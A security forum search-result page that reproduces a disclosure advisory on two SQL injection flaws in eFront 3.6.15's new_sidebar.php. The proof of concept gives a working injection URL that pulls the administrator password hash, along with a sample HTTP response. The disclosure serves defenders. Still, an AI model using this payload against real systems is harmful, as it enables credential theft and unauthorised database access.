Jump to content

Search the Community

Showing results for tags '3.6.15'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 1 result

  1. eFront 3.6.15 Multiple SQL Injection Vulnerabilities [+] Author: Filippo Roncari | Luca De Fulgentis [+] Target: eFront [+] Version: 3.6.15 and probably lower [+] Vendor: www.efrontlearning.net [+] Accessibility: Remote [+] Severity: High [+] CVE: <requested> [+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf [+] Info: f.roncari@securenetwork.it [+] Summary eFront is an open source Learning Management System (LMS) used to create and manage online training courses. From Wikipedia: “eFront is designed to assist with the creation of online learning communities while offering various opportunities for collaboration and interaction through an icon-based user interface. The platform offers tools for content creation, tests building, assignments management, reporting, internal messaging, forum, chat, surveys, calendar and others”. [+] Vulnerability Details The new_sidebar.php module, which handles the left side bar in eFront 3.6.15 default theme, is affected by two SQL injection vulnerabilities due to lack of user input sanitization. The identified issues allow unprivileged users, such as professors and students (under certain conditions), to inject arbitrary SQL statements. An attacker could exploit the vulnerabilities by sending specially crafted requests to the web application. These issues can lead to data theft, data disruption, account violation and other impacts depending on the DBMS’s user privileges. [+] Technical Details View full advisory at https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf for technical details and source code. [+] Proof of Concept (PoC) Any unprivileged authenticated user (e.g., student or professor) can exploit this issue, taking into account that: 1. An attacker has to access a lesson (= click on any open lesson) before executing the malicious request. 2. If logged as a Student, a potential attacker has to access a lesson for which his User Type has “content” set to hidden. 3. The default theme, or others that use the sidebar, must be in use. [!] PoC URL ----------------------------- http://target.site/www/new_sidebar.php?sbctg=lessons&new_lesson_id=null+union+select+password+from+users+where+id=1 ----------------------------- The administrator password hash is returned directly in the HTML body as part of the forum link in the sidebar menu. [!] HTTP Response ----------------------------- HTTP/1.1 200 OK Date: Thu, 09 Apr 2015 22:42:19 GMT Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/html Content-Length: 28786 [...] <div class = "menuOption" name="lessonSpecific" id="forum_a" > <table> <tr> <td> target="mainframe"> <a href = "professor.php?ctg=forum&forum=11ff89cb38b258fb50fe8672c18ff79b" <img src='themes/default/images/others/transparent.gif' class = 'handle sprite16 sprite16-message' > </a> </td> <td class = "menuListOption" > <a href = "professor.php?ctg=forum&forum=11ff89cb38b258fb50fe8672c18ff79b" title="Forum" target="mainframe">Forum</a> </td> </tr> </table> </div> [...] ----------------------------- For further details and explanations check the full advisory. [+] Disclaimer Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. Surs?: http://dl.packetstormsecurity.net/1505-exploits/efront3615-sql.txt
×
×
  • Create New...